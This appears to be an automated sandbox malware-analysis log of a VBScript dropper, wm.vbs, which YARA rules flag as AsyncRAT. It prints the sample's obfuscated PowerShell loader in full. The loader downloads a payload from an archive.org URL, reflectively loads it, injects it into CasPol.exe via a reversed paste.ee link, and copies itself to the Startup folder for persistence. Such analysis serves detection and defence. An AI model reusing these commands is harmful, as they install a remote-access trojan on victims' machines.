                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF886D132925_2_00007FF886D13292
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887A20DE09_2_00007FF887A20DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0161634810_2_01616348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_016184B810_2_016184B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0161567010_2_01615670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0161AC1010_2_0161AC10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0161532810_2_01615328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_01610BA010_2_01610BA0
                Source: wm.vbsInitial sample: Strings found which are bigger than 50
                Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: powershell.exe PID: 8152, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@15/8@2/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\mR0UgXYus56nykvx
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gs4dr5x.1ht.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
